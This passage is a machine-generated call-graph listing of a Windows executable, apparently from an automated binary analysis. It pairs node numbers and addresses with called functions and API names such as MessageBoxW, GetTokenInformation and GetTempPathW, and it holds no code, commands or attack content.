7ff72aa822d2 16787->16788 16790 7ff72aa8238f 16787->16790 16789 7ff72aa812a0 12 API calls 16788->16789 16792 7ff72aa8230f 16788->16792 16789->16792 16791 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 16790->16791 16791->16792 16792->16727 16794 7ff72aa81e93 16793->16794 16795 7ff72aa81ec2 16794->16795 16797 7ff72aa81f7f 16794->16797 16796 7ff72aa812a0 12 API calls 16795->16796 16799 7ff72aa81eff 16795->16799 16796->16799 16798 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 16797->16798 16798->16799 16799->16727 16801 7ff72aa826b3 16800->16801 16802 7ff72aa826e2 16801->16802 16804 7ff72aa8279f 16801->16804 16803 7ff72aa812a0 12 API calls 16802->16803 16806 7ff72aa8271f 16802->16806 16803->16806 16805 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 16804->16805 16805->16806 16806->16727 16808 7ff72aa8f420 16807->16808 16809 7ff72aa8f465 16808->16809 16810 7ff72aa84ee0 45 API calls 16808->16810 16814 7ff72aa8f425 memcpy_s 16808->16814 16816 7ff72aa8f44e memcpy_s 16808->16816 16809->16814 16809->16816 16962 7ff72aa90aa8 16809->16962 16810->16809 16811 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 16811->16814 16814->16727 16816->16811 16816->16814 16818 7ff72aa812d7 16817->16818 16819 7ff72aa812c6 16817->16819 16818->16819 16847 7ff72aa8e19c 16818->16847 16825 7ff72aa8f110 16819->16825 16822 7ff72aa81318 16824 7ff72aa8b4ec __free_lconv_num 11 API calls 16822->16824 16823 7ff72aa8b4ec __free_lconv_num 11 API calls 16823->16822 16824->16819 16826 7ff72aa8f160 16825->16826 16827 7ff72aa8f12d 16825->16827 16826->16827 16829 7ff72aa8f192 16826->16829 16828 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 16827->16828 16838 7ff72aa84761 16828->16838 16830 7ff72aa8f2a5 16829->16830 16839 7ff72aa8f1da 16829->16839 16831 7ff72aa8f397 16830->16831 16833 7ff72aa8f35d 16830->16833 16835 7ff72aa8f32c 16830->16835 16837 7ff72aa8f2ef 16830->16837 16841 7ff72aa8f2e5 16830->16841 16887 7ff72aa8e5fc 16831->16887 16880 7ff72aa8e994 16833->16880 16873 7ff72aa8ec74 16835->16873 16863 7ff72aa8eea4 16837->16863 16838->16774 16838->16776 16839->16838 16854 7ff72aa8b01c 16839->16854 16841->16833 16842 7ff72aa8f2ea 16841->16842 16842->16835 16842->16837 16845 7ff72aa8b4a4 _wfindfirst32i64 17 API calls 16846 7ff72aa8f3f4 16845->16846 16848 7ff72aa8e1e7 16847->16848 16852 7ff72aa8e1ab memcpy_s 16847->16852 16849 7ff72aa85aa4 memcpy_s 11 API calls 16848->16849 16851 7ff72aa81304 16849->16851 16850 7ff72aa8e1ce RtlAllocateHeap 16850->16851 16850->16852 16851->16822 16851->16823 16852->16848 16852->16850 16853 7ff72aa941e0 memcpy_s 2 API calls 16852->16853 16853->16852 16855 7ff72aa8b029 16854->16855 16858 7ff72aa8b033 16854->16858 16855->16858 16861 7ff72aa8b04e 16855->16861 16856 7ff72aa85aa4 memcpy_s 11 API calls 16857 7ff72aa8b03a 16856->16857 16896 7ff72aa8b484 16857->16896 16858->16856 16860 7ff72aa8b046 16860->16838 16860->16845 16861->16860 16862 7ff72aa85aa4 memcpy_s 11 API calls 16861->16862 16862->16857 16898 7ff72aa94cfc 16863->16898 16867 7ff72aa8ef4c 16868 7ff72aa8ef50 16867->16868 16869 7ff72aa8efa1 16867->16869 16870 7ff72aa8ef6c 16867->16870 16868->16838 16951 7ff72aa8ea90 16869->16951 16947 7ff72aa8ed4c 16870->16947 16874 7ff72aa94cfc 38 API calls 16873->16874 16875 7ff72aa8ecbe 16874->16875 16876 7ff72aa94744 37 API calls 16875->16876 16877 7ff72aa8ed0e 16876->16877 16878 7ff72aa8ed12 16877->16878 16879 7ff72aa8ed4c 45 API calls 16877->16879 16878->16838 16879->16878 16881 7ff72aa94cfc 38 API calls 16880->16881 16882 7ff72aa8e9df 16881->16882 16883 7ff72aa94744 37 API calls 16882->16883 16884 7ff72aa8ea37 16883->16884 16885 7ff72aa8ea3b 16884->16885 16886 7ff72aa8ea90 45 API calls 16884->16886 16885->16838 16886->16885 16888 7ff72aa8e641 16887->16888 16889 7ff72aa8e674 16887->16889 16890 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 16888->16890 16891 7ff72aa8e68c 16889->16891 16893 7ff72aa8e70d 16889->16893 16895 7ff72aa8e66d memcpy_s 16890->16895 16892 7ff72aa8e994 46 API calls 16891->16892 16892->16895 16894 7ff72aa84ee0 45 API calls 16893->16894 16893->16895 16894->16895 16895->16838 16897 7ff72aa8b31c _invalid_parameter_noinfo 37 API calls 16896->16897 16899 7ff72aa94d4f fegetenv 16898->16899 16900 7ff72aa98c5c 37 API calls 16899->16900 16905 7ff72aa94da2 16900->16905 16901 7ff72aa94dcf 16904 7ff72aa8b01c __std_exception_copy 37 API calls 16901->16904 16902 7ff72aa94e92 16903 7ff72aa98c5c 37 API calls 16902->16903 16906 7ff72aa94ebc 16903->16906 16908 7ff72aa94e4d 16904->16908 16905->16902 16909 7ff72aa94dbd 16905->16909 16910 7ff72aa94e6c 16905->16910 16907 7ff72aa98c5c 37 API calls 16906->16907 16911 7ff72aa94ecd 16907->16911 16912 7ff72aa95f74 16908->16912 16917 7ff72aa94e55 16908->16917 16909->16901 16909->16902 16913 7ff72aa8b01c __std_exception_copy 37 API calls 16910->16913 16914 7ff72aa98e50 20 API calls 16911->16914 16915 7ff72aa8b4a4 _wfindfirst32i64 17 API calls 16912->16915 16913->16908 16925 7ff72aa94f36 memcpy_s 16914->16925 16916 7ff72aa95f89 16915->16916 16918 7ff72aa7be00 _wfindfirst32i64 8 API calls 16917->16918 16919 7ff72aa8eef1 16918->16919 16943 7ff72aa94744 16919->16943 16920 7ff72aa952df memcpy_s 16921 7ff72aa9561f 16922 7ff72aa94860 37 API calls 16921->16922 16931 7ff72aa95d37 16922->16931 16923 7ff72aa955cb 16923->16921 16927 7ff72aa95f8c memcpy_s 37 API calls 16923->16927 16924 7ff72aa94f77 memcpy_s 16933 7ff72aa958bb memcpy_s 16924->16933 16935 7ff72aa953d3 memcpy_s 16924->16935 16925->16920 16925->16924 16928 7ff72aa85aa4 memcpy_s 11 API calls 16925->16928 16926 7ff72aa95d92 16932 7ff72aa95f18 16926->16932 16939 7ff72aa94860 37 API calls 16926->16939 16942 7ff72aa95f8c memcpy_s 37 API calls 16926->16942 16927->16921 16929 7ff72aa953b0 16928->16929 16930 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 16929->16930 16930->16924 16931->16926 16934 7ff72aa95f8c memcpy_s 37 API calls 16931->16934 16936 7ff72aa98c5c 37 API calls 16932->16936 16933->16921 16933->16923 16937 7ff72aa85aa4 11 API calls memcpy_s 16933->16937 16940 7ff72aa8b484 37 API calls _invalid_parameter_noinfo 16933->16940 16934->16926 16935->16923 16938 7ff72aa85aa4 11 API calls memcpy_s 16935->16938 16941 7ff72aa8b484 37 API calls _invalid_parameter_noinfo 16935->16941 16936->16917 16937->16933 16938->16935 16939->16926 16940->16933 16941->16935 16942->16926 16944 7ff72aa94763 16943->16944 16945 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 16944->16945 16946 7ff72aa9478e memcpy_s 16944->16946 16945->16946 16946->16867 16948 7ff72aa8ed78 memcpy_s 16947->16948 16949 7ff72aa84ee0 45 API calls 16948->16949 16950 7ff72aa8ee32 memcpy_s 16948->16950 16949->16950 16950->16868 16952 7ff72aa8eacb 16951->16952 16956 7ff72aa8eb18 memcpy_s 16951->16956 16953 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 16952->16953 16954 7ff72aa8eaf7 16953->16954 16954->16868 16955 7ff72aa8eb83 16957 7ff72aa8b01c __std_exception_copy 37 API calls 16955->16957 16956->16955 16958 7ff72aa84ee0 45 API calls 16956->16958 16961 7ff72aa8ebc5 memcpy_s 16957->16961 16958->16955 16959 7ff72aa8b4a4 _wfindfirst32i64 17 API calls 16960 7ff72aa8ec70 16959->16960 16961->16959 16963 7ff72aa90acc WideCharToMultiByte 16962->16963 16966 7ff72aa81473 16965->16966 16967 7ff72aa81461 16965->16967 16969 7ff72aa81480 16966->16969 16973 7ff72aa814bd 16966->16973 16968 7ff72aa85aa4 memcpy_s 11 API calls 16967->16968 16970 7ff72aa81466 16968->16970 16971 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 16969->16971 16972 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 16970->16972 16979 7ff72aa81471 16971->16979 16972->16979 16974 7ff72aa81566 16973->16974 16975 7ff72aa85aa4 memcpy_s 11 API calls 16973->16975 16976 7ff72aa85aa4 memcpy_s 11 API calls 16974->16976 16974->16979 16977 7ff72aa8155b 16975->16977 16978 7ff72aa81610 16976->16978 16980 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 16977->16980 16981 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 16978->16981 16979->16603 16980->16974 16981->16979 16983 7ff72aa8e571 16982->16983 16984 7ff72aa84f1f 16982->16984 16983->16984 16990 7ff72aa93f54 16983->16990 16986 7ff72aa8e5c4 16984->16986 16987 7ff72aa8e5dd 16986->16987 16989 7ff72aa84f2f 16986->16989 16987->16989 17034 7ff72aa932a0 16987->17034 16989->16603 17002 7ff72aa8bcf0 GetLastError 16990->17002 16993 7ff72aa93fae 16993->16984 17003 7ff72aa8bd31 FlsSetValue 17002->17003 17004 7ff72aa8bd14 FlsGetValue 17002->17004 17006 7ff72aa8bd43 17003->17006 17022 7ff72aa8bd21 17003->17022 17005 7ff72aa8bd2b 17004->17005 17004->17022 17005->17003 17008 7ff72aa8f738 memcpy_s 11 API calls 17006->17008 17007 7ff72aa8bd9d SetLastError 17009 7ff72aa8bdaa 17007->17009 17010 7ff72aa8bdbd 17007->17010 17011 7ff72aa8bd52 17008->17011 17009->16993 17024 7ff72aa91298 EnterCriticalSection 17009->17024 17025 7ff72aa8b07c 17010->17025 17013 7ff72aa8bd70 FlsSetValue 17011->17013 17014 7ff72aa8bd60 FlsSetValue 17011->17014 17015 7ff72aa8bd7c FlsSetValue 17013->17015 17016 7ff72aa8bd8e 17013->17016 17018 7ff72aa8bd69 17014->17018 17015->17018 17019 7ff72aa8ba98 memcpy_s 11 API calls 17016->17019 17020 7ff72aa8b4ec __free_lconv_num 11 API calls 17018->17020 17021 7ff72aa8bd96 17019->17021 17020->17022 17023 7ff72aa8b4ec __free_lconv_num 11 API calls 17021->17023 17022->17007 17023->17007 17026 7ff72aa942a0 __CxxCallCatchBlock EnterCriticalSection LeaveCriticalSection 17025->17026 17027 7ff72aa8b085 17026->17027 17028 7ff72aa8b094 17027->17028 17029 7ff72aa942f0 __CxxCallCatchBlock 44 API calls 17027->17029 17030 7ff72aa8b0c7 __CxxCallCatchBlock 17028->17030 17031 7ff72aa8b09d IsProcessorFeaturePresent 17028->17031 17029->17028 17032 7ff72aa8b0ac 17031->17032 17033 7ff72aa8b1b8 _wfindfirst32i64 14 API calls 17032->17033 17033->17030 17035 7ff72aa8bcf0 __CxxCallCatchBlock 45 API calls 17034->17035 17036 7ff72aa932a9 17035->17036 17044 7ff72aa8594c EnterCriticalSection 17037->17044 17046 7ff72aa7288c 17045->17046 17047 7ff72aa850a4 49 API calls 17046->17047 17048 7ff72aa728dd 17047->17048 17049 7ff72aa85aa4 memcpy_s 11 API calls 17048->17049 17050 7ff72aa728e2 17049->17050 17064 7ff72aa85ac4 17050->17064 17053 7ff72aa71ee0 49 API calls 17054 7ff72aa72911 memcpy_s 17053->17054 17055 7ff72aa78bd0 57 API calls 17054->17055 17056 7ff72aa72946 17055->17056 17057 7ff72aa7294b 17056->17057 17058 7ff72aa72983 MessageBoxA 17056->17058 17059 7ff72aa78bd0 57 API calls 17057->17059 17060 7ff72aa7299d 17058->17060 17061 7ff72aa72965 MessageBoxW 17059->17061 17062 7ff72aa7be00 _wfindfirst32i64 8 API calls 17060->17062 17061->17060 17063 7ff72aa729ad 17062->17063 17063->16252 17065 7ff72aa8be68 memcpy_s 11 API calls 17064->17065 17066 7ff72aa85adb 17065->17066 17067 7ff72aa728e9 17066->17067 17068 7ff72aa8f738 memcpy_s 11 API calls 17066->17068 17071 7ff72aa85b1b 17066->17071 17067->17053 17069 7ff72aa85b10 17068->17069 17070 7ff72aa8b4ec __free_lconv_num 11 API calls 17069->17070 17070->17071 17071->17067 17076 7ff72aa8fe08 17071->17076 17074 7ff72aa8b4a4 _wfindfirst32i64 17 API calls 17075 7ff72aa85b60 17074->17075 17079 7ff72aa8fe25 17076->17079 17077 7ff72aa8fe2a 17078 7ff72aa85aa4 memcpy_s 11 API calls 17077->17078 17081 7ff72aa85b41 17077->17081 17084 7ff72aa8fe34 17078->17084 17079->17077 17079->17081 17082 7ff72aa8fe74 17079->17082 17080 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 17080->17081 17081->17067 17081->17074 17082->17081 17083 7ff72aa85aa4 memcpy_s 11 API calls 17082->17083 17083->17084 17084->17080 17086 7ff72aa78d04 WideCharToMultiByte 17085->17086 17087 7ff72aa78d72 WideCharToMultiByte 17085->17087 17089 7ff72aa78d2e 17086->17089 17091 7ff72aa78d45 17086->17091 17088 7ff72aa78d9f 17087->17088 17093 7ff72aa73f15 17087->17093 17092 7ff72aa729c0 57 API calls 17088->17092 17090 7ff72aa729c0 57 API calls 17089->17090 17090->17093 17091->17087 17094 7ff72aa78d5b 17091->17094 17092->17093 17093->16261 17093->16264 17095 7ff72aa729c0 57 API calls 17094->17095 17095->17093 17097 7ff72aa77bde 17096->17097 17098 7ff72aa8af93 17096->17098 17097->16279 17098->17097 17099 7ff72aa8b01c __std_exception_copy 37 API calls 17098->17099 17100 7ff72aa8afc0 17099->17100 17100->17097 17101 7ff72aa8b4a4 _wfindfirst32i64 17 API calls 17100->17101 17102 7ff72aa8aff0 17101->17102 17104 7ff72aa73fc0 116 API calls 17103->17104 17105 7ff72aa71ac6 17104->17105 17106 7ff72aa71c74 17105->17106 17108 7ff72aa782b0 83 API calls 17105->17108 17107 7ff72aa7be00 _wfindfirst32i64 8 API calls 17106->17107 17109 7ff72aa71c88 17107->17109 17110 7ff72aa71afe 17108->17110 17109->16298 17136 7ff72aa73e30 17109->17136 17135 7ff72aa71b2f 17110->17135 17142 7ff72aa80df4 17110->17142 17112 7ff72aa8076c 74 API calls 17112->17106 17113 7ff72aa71b18 17114 7ff72aa71b1c 17113->17114 17115 7ff72aa71b34 17113->17115 17117 7ff72aa72870 59 API calls 17114->17117 17146 7ff72aa80abc 17115->17146 17117->17135 17119 7ff72aa71b67 17122 7ff72aa80df4 73 API calls 17119->17122 17120 7ff72aa71b4f 17121 7ff72aa72870 59 API calls 17120->17121 17121->17135 17123 7ff72aa71bb4 17122->17123 17124 7ff72aa71bde 17123->17124 17125 7ff72aa71bc6 17123->17125 17127 7ff72aa80abc _fread_nolock 53 API calls 17124->17127 17126 7ff72aa72870 59 API calls 17125->17126 17126->17135 17128 7ff72aa71bf3 17127->17128 17129 7ff72aa71c0e 17128->17129 17130 7ff72aa71bf9 17128->17130 17149 7ff72aa80830 17129->17149 17131 7ff72aa72870 59 API calls 17130->17131 17131->17135 17134 7ff72aa72b10 59 API calls 17134->17135 17135->17112 17137 7ff72aa71ee0 49 API calls 17136->17137 17138 7ff72aa73e4d 17137->17138 17138->16299 17140 7ff72aa71ee0 49 API calls 17139->17140 17141 7ff72aa74070 17140->17141 17141->16298 17143 7ff72aa80e24 17142->17143 17155 7ff72aa80b84 17143->17155 17145 7ff72aa80e3d 17145->17113 17167 7ff72aa80adc 17146->17167 17150 7ff72aa80839 17149->17150 17154 7ff72aa71c22 17149->17154 17154->17134 17154->17135 17156 7ff72aa80bee 17155->17156 17157 7ff72aa80bae 17155->17157 17156->17157 17158 7ff72aa80bfa 17156->17158 17159 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 17157->17159 17166 7ff72aa8594c EnterCriticalSection 17158->17166 17161 7ff72aa80bd5 17159->17161 17161->17145 17168 7ff72aa80b06 17167->17168 17169 7ff72aa71b49 17167->17169 17168->17169 17170 7ff72aa80b15 memcpy_s 17168->17170 17171 7ff72aa80b52 17168->17171 17169->17119 17169->17120 17173 7ff72aa85aa4 memcpy_s 11 API calls 17170->17173 17180 7ff72aa8594c EnterCriticalSection 17171->17180 17175 7ff72aa80b2a 17173->17175 17177 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 17175->17177 17177->17169 17182 7ff72aa78711 __vcrt_freefls 17181->17182 17183 7ff72aa7868f GetTokenInformation 17181->17183 17185 7ff72aa7872a 17182->17185 17186 7ff72aa78724 CloseHandle 17182->17186 17184 7ff72aa786b0 GetLastError 17183->17184 17187 7ff72aa786bb 17183->17187 17184->17182 17184->17187 17185->16308 17186->17185 17187->17182 17188 7ff72aa786d7 GetTokenInformation 17187->17188 17188->17182 17189 7ff72aa786fa 17188->17189 17189->17182 17190 7ff72aa78704 ConvertSidToStringSidW 17189->17190 17190->17182 17192 7ff72aa78765 17191->17192 17208 7ff72aa852f8 17192->17208 17196 7ff72aa72c50 17195->17196 17197 7ff72aa850a4 49 API calls 17196->17197 17198 7ff72aa72c9b memcpy_s 17197->17198 17199 7ff72aa78bd0 57 API calls 17198->17199 17200 7ff72aa72cd0 17199->17200 17201 7ff72aa72d0d MessageBoxA 17200->17201 17202 7ff72aa72cd5 17200->17202 17203 7ff72aa72d27 17201->17203 17204 7ff72aa78bd0 57 API calls 17202->17204 17206 7ff72aa7be00 _wfindfirst32i64 8 API calls 17203->17206 17205 7ff72aa72cef MessageBoxW 17204->17205 17205->17203 17207 7ff72aa72d37 17206->17207 17207->16318 17210 7ff72aa85352 17208->17210 17209 7ff72aa85377 17212 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 17209->17212 17210->17209 17211 7ff72aa853b3 17210->17211 17226 7ff72aa836b0 17211->17226 17214 7ff72aa853a1 17212->17214 17215 7ff72aa7be00 _wfindfirst32i64 8 API calls 17214->17215 17218 7ff72aa78788 17215->17218 17216 7ff72aa8b4ec __free_lconv_num 11 API calls 17216->17214 17218->16314 17219 7ff72aa85494 17219->17216 17220 7ff72aa854ba 17220->17219 17223 7ff72aa854c4 17220->17223 17221 7ff72aa85469 17224 7ff72aa8b4ec __free_lconv_num 11 API calls 17221->17224 17222 7ff72aa85460 17222->17219 17222->17221 17225 7ff72aa8b4ec __free_lconv_num 11 API calls 17223->17225 17224->17214 17225->17214 17227 7ff72aa836ee 17226->17227 17228 7ff72aa836de 17226->17228 17229 7ff72aa836f7 17227->17229 17233 7ff72aa83725 17227->17233 17231 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 17228->17231 17232 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 17229->17232 17230 7ff72aa8371d 17230->17219 17230->17220 17230->17221 17230->17222 17231->17230 17232->17230 17233->17228 17233->17230 17237 7ff72aa840c4 17233->17237 17270 7ff72aa83b10 17233->17270 17307 7ff72aa832a0 17233->17307 17238 7ff72aa84177 17237->17238 17239 7ff72aa84106 17237->17239 17242 7ff72aa8417c 17238->17242 17243 7ff72aa841d0 17238->17243 17240 7ff72aa8410c 17239->17240 17241 7ff72aa841a1 17239->17241 17244 7ff72aa84111 17240->17244 17245 7ff72aa84140 17240->17245 17326 7ff72aa82474 17241->17326 17246 7ff72aa8417e 17242->17246 17247 7ff72aa841b1 17242->17247 17249 7ff72aa841e7 17243->17249 17251 7ff72aa841da 17243->17251 17256 7ff72aa841df 17243->17256 17244->17249 17252 7ff72aa84117 17244->17252 17245->17252 17245->17256 17250 7ff72aa84120 17246->17250 17259 7ff72aa8418d 17246->17259 17333 7ff72aa82064 17247->17333 17340 7ff72aa84dcc 17249->17340 17268 7ff72aa84210 17250->17268 17310 7ff72aa84878 17250->17310 17251->17241 17251->17256 17252->17250 17257 7ff72aa84152 17252->17257 17265 7ff72aa8413b 17252->17265 17256->17268 17344 7ff72aa82884 17256->17344 17257->17268 17320 7ff72aa84bb4 17257->17320 17259->17241 17261 7ff72aa84192 17259->17261 17264 7ff72aa84c78 37 API calls 17261->17264 17261->17268 17262 7ff72aa7be00 _wfindfirst32i64 8 API calls 17263 7ff72aa8450a 17262->17263 17263->17233 17264->17265 17266 7ff72aa84ee0 45 API calls 17265->17266 17265->17268 17269 7ff72aa843fc 17265->17269 17266->17269 17268->17262 17269->17268 17351 7ff72aa8f5a8 17269->17351 17271 7ff72aa83b1e 17270->17271 17272 7ff72aa83b34 17270->17272 17273 7ff72aa83b74 17271->17273 17274 7ff72aa84177 17271->17274 17275 7ff72aa84106 17271->17275 17272->17273 17276 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 17272->17276 17273->17233 17279 7ff72aa8417c 17274->17279 17280 7ff72aa841d0 17274->17280 17277 7ff72aa8410c 17275->17277 17278 7ff72aa841a1 17275->17278 17276->17273 17281 7ff72aa84111 17277->17281 17282 7ff72aa84140 17277->17282 17285 7ff72aa82474 38 API calls 17278->17285 17283 7ff72aa8417e 17279->17283 17284 7ff72aa841b1 17279->17284 17286 7ff72aa841e7 17280->17286 17288 7ff72aa841da 17280->17288 17292 7ff72aa841df 17280->17292 17281->17286 17289 7ff72aa84117 17281->17289 17282->17289 17282->17292 17287 7ff72aa84120 17283->17287 17296 7ff72aa8418d 17283->17296 17290 7ff72aa82064 38 API calls 17284->17290 17302 7ff72aa8413b 17285->17302 17293 7ff72aa84dcc 45 API calls 17286->17293 17291 7ff72aa84878 47 API calls 17287->17291 17305 7ff72aa84210 17287->17305 17288->17278 17288->17292 17289->17287 17294 7ff72aa84152 17289->17294 17289->17302 17290->17302 17291->17302 17295 7ff72aa82884 38 API calls 17292->17295 17292->17305 17293->17302 17297 7ff72aa84bb4 46 API calls 17294->17297 17294->17305 17295->17302 17296->17278 17298 7ff72aa84192 17296->17298 17297->17302 17301 7ff72aa84c78 37 API calls 17298->17301 17298->17305 17299 7ff72aa7be00 _wfindfirst32i64 8 API calls 17300 7ff72aa8450a 17299->17300 17300->17233 17301->17302 17303 7ff72aa84ee0 45 API calls 17302->17303 17302->17305 17306 7ff72aa843fc 17302->17306 17303->17306 17304 7ff72aa8f5a8 46 API calls 17304->17306 17305->17299 17306->17304 17306->17305 17385 7ff72aa816e8 17307->17385 17311 7ff72aa8489e 17310->17311 17312 7ff72aa812a0 12 API calls 17311->17312 17313 7ff72aa848ee 17312->17313 17323 7ff72aa84be9 17320->17323 17321 7ff72aa84c2e 17321->17265 17322 7ff72aa84c07 17323->17321 17323->17322 17324 7ff72aa84ee0 45 API calls 17323->17324 17324->17322 17329 7ff72aa824a7 17326->17329 17327 7ff72aa824d6 17332 7ff72aa82513 17327->17332 17363 7ff72aa81348 17327->17363 17329->17327 17330 7ff72aa82593 17329->17330 17331 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 17330->17331 17331->17332 17332->17265 17334 7ff72aa82097 17333->17334 17335 7ff72aa820c6 17334->17335 17337 7ff72aa82183 17334->17337 17336 7ff72aa81348 12 API calls 17335->17336 17339 7ff72aa82103 17335->17339 17336->17339 17338 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 17337->17338 17338->17339 17339->17265 17341 7ff72aa84e0f 17340->17341 17343 7ff72aa84e13 __crtLCMapStringW 17341->17343 17371 7ff72aa84e68 17341->17371 17343->17265 17345 7ff72aa828b7 17344->17345 17346 7ff72aa828e6 17345->17346 17348 7ff72aa829a3 17345->17348 17347 7ff72aa81348 12 API calls 17346->17347 17350 7ff72aa82923 17346->17350 17347->17350 17349 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 17348->17349 17349->17350 17350->17265 17352 7ff72aa8f5e7 17351->17352 17353 7ff72aa8f5d9 17351->17353 17352->17269 17353->17352 17364 7ff72aa8137f 17363->17364 17370 7ff72aa8136e 17363->17370 17365 7ff72aa8e19c _fread_nolock 12 API calls 17364->17365 17364->17370 17370->17332 17372 7ff72aa84e8e 17371->17372 17373 7ff72aa84e86 17371->17373 17372->17343 17374 7ff72aa84ee0 45 API calls 17373->17374 17374->17372 17386 7ff72aa8171d 17385->17386 17387 7ff72aa8172f 17385->17387 17388 7ff72aa85aa4 memcpy_s 11 API calls 17386->17388 17390 7ff72aa8173d 17387->17390 17394 7ff72aa81779 17387->17394 17389 7ff72aa81722 17388->17389 17391 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 17389->17391 17392 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 17390->17392 17401 7ff72aa8172d 17391->17401 17392->17401 17393 7ff72aa81af5 17396 7ff72aa85aa4 memcpy_s 11 API calls 17393->17396 17393->17401 17394->17393 17395 7ff72aa85aa4 memcpy_s 11 API calls 17394->17395 17398 7ff72aa81aea 17395->17398 17397 7ff72aa81d89 17396->17397 17399 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 17397->17399 17400 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 17398->17400 17399->17401 17400->17393 17401->17233 17403 7ff72aa77966 17402->17403 17404 7ff72aa779dd GetTempPathW 17403->17404 17405 7ff72aa7798a 17403->17405 17406 7ff72aa779f2 17404->17406 17407 7ff72aa77b60 61 API calls 17405->17407 17441 7ff72aa72810 17406->17441 17408 7ff72aa77996 17407->17408 17453 7ff72aa77420 17408->17453 17419 7ff72aa77ab6 17420 7ff72aa77a0b __vcrt_freefls 17420->17419 17424 7ff72aa77a41 17420->17424 17445 7ff72aa89084 17420->17445 17448 7ff72aa78b70 17420->17448 17442 7ff72aa72835 17441->17442 17443 7ff72aa852f8 48 API calls 17442->17443 17444 7ff72aa72854 17443->17444 17444->17420 17454 7ff72aa7742c 17453->17454 17455 7ff72aa78bd0 57 API calls 17454->17455 17456 7ff72aa7744e 17455->17456 17457 7ff72aa77469 ExpandEnvironmentStringsW 17456->17457 17458 7ff72aa77456 17456->17458 17735 7ff72aa7172e 17734->17735 17736 7ff72aa71716 17734->17736 17738 7ff72aa71758 17735->17738 17739 7ff72aa71734 17735->17739 17737 7ff72aa72b10 59 API calls 17736->17737 17740 7ff72aa71722 17737->17740 17827 7ff72aa77c10 17738->17827 17864 7ff72aa712a0 17739->17864 17740->16347 17745 7ff72aa7177d 17748 7ff72aa72870 59 API calls 17745->17748 17746 7ff72aa717a9 17749 7ff72aa73fc0 116 API calls 17746->17749 17747 7ff72aa7174f 17747->16347 17751 7ff72aa71793 17748->17751 17752 7ff72aa717be 17749->17752 17750 7ff72aa72b10 59 API calls 17750->17747 17751->16347 17753 7ff72aa717de 17752->17753 17754 7ff72aa717c6 17752->17754 17756 7ff72aa80df4 73 API calls 17753->17756 17755 7ff72aa72b10 59 API calls 17754->17755 17757 7ff72aa717d5 17755->17757 17758 7ff72aa717ef 17756->17758 17777 7ff72aa72d66 17776->17777 17778 7ff72aa71ee0 49 API calls 17777->17778 17779 7ff72aa72d99 17778->17779 17780 7ff72aa73e30 49 API calls 17779->17780 17826 7ff72aa730ca 17779->17826 17781 7ff72aa72e07 17780->17781 17782 7ff72aa73e30 49 API calls 17781->17782 17783 7ff72aa72e18 17782->17783 17784 7ff72aa72e39 17783->17784 17785 7ff72aa72e75 17783->17785 17986 7ff72aa73190 17784->17986 17786 7ff72aa73190 75 API calls 17785->17786 17788 7ff72aa72e73 17786->17788 17789 7ff72aa72ef6 17788->17789 17790 7ff72aa72eb4 17788->17790 17792 7ff72aa73190 75 API calls 17789->17792 17994 7ff72aa775a0 17790->17994 17794 7ff72aa72f20 17792->17794 17798 7ff72aa73190 75 API calls 17794->17798 17804 7ff72aa72fbc 17794->17804 17801 7ff72aa72f52 17798->17801 17799 7ff72aa71ea0 59 API calls 17801->17804 17804->17799 17819 7ff72aa730cf 17804->17819 17828 7ff72aa77c20 17827->17828 17829 7ff72aa71ee0 49 API calls 17828->17829 17830 7ff72aa77c61 17829->17830 17844 7ff72aa77ce1 17830->17844 17907 7ff72aa73f50 17830->17907 17832 7ff72aa7be00 _wfindfirst32i64 8 API calls 17834 7ff72aa71775 17832->17834 17834->17745 17834->17746 17835 7ff72aa77d1b 17913 7ff72aa777c0 17835->17913 17837 7ff72aa77b60 61 API calls 17845 7ff72aa77c92 __vcrt_freefls 17837->17845 17839 7ff72aa77d04 17841 7ff72aa72c30 59 API calls 17839->17841 17840 7ff72aa77cd0 17841->17835 17844->17832 17845->17839 17845->17840 17865 7ff72aa712b2 17864->17865 17866 7ff72aa73fc0 116 API calls 17865->17866 17867 7ff72aa712e2 17866->17867 17868 7ff72aa712ea 17867->17868 17869 7ff72aa71301 17867->17869 17870 7ff72aa72b10 59 API calls 17868->17870 17871 7ff72aa80df4 73 API calls 17869->17871 17899 7ff72aa712fa __vcrt_freefls 17870->17899 17872 7ff72aa71313 17871->17872 17873 7ff72aa71317 17872->17873 17875 7ff72aa7133d 17872->17875 17874 7ff72aa72870 59 API calls 17873->17874 17876 7ff72aa7132e 17874->17876 17877 7ff72aa71358 17875->17877 17878 7ff72aa71380 17875->17878 17880 7ff72aa8076c 74 API calls 17876->17880 17881 7ff72aa72870 59 API calls 17877->17881 17882 7ff72aa7139a 17878->17882 17894 7ff72aa71453 17878->17894 17879 7ff72aa7be00 _wfindfirst32i64 8 API calls 17883 7ff72aa71444 17879->17883 17880->17899 17884 7ff72aa71373 17881->17884 17885 7ff72aa71050 98 API calls 17882->17885 17883->17747 17883->17750 17887 7ff72aa8076c 74 API calls 17884->17887 17888 7ff72aa713ab 17885->17888 17886 7ff72aa713b3 17889 7ff72aa8076c 74 API calls 17886->17889 17887->17899 17888->17886 17890 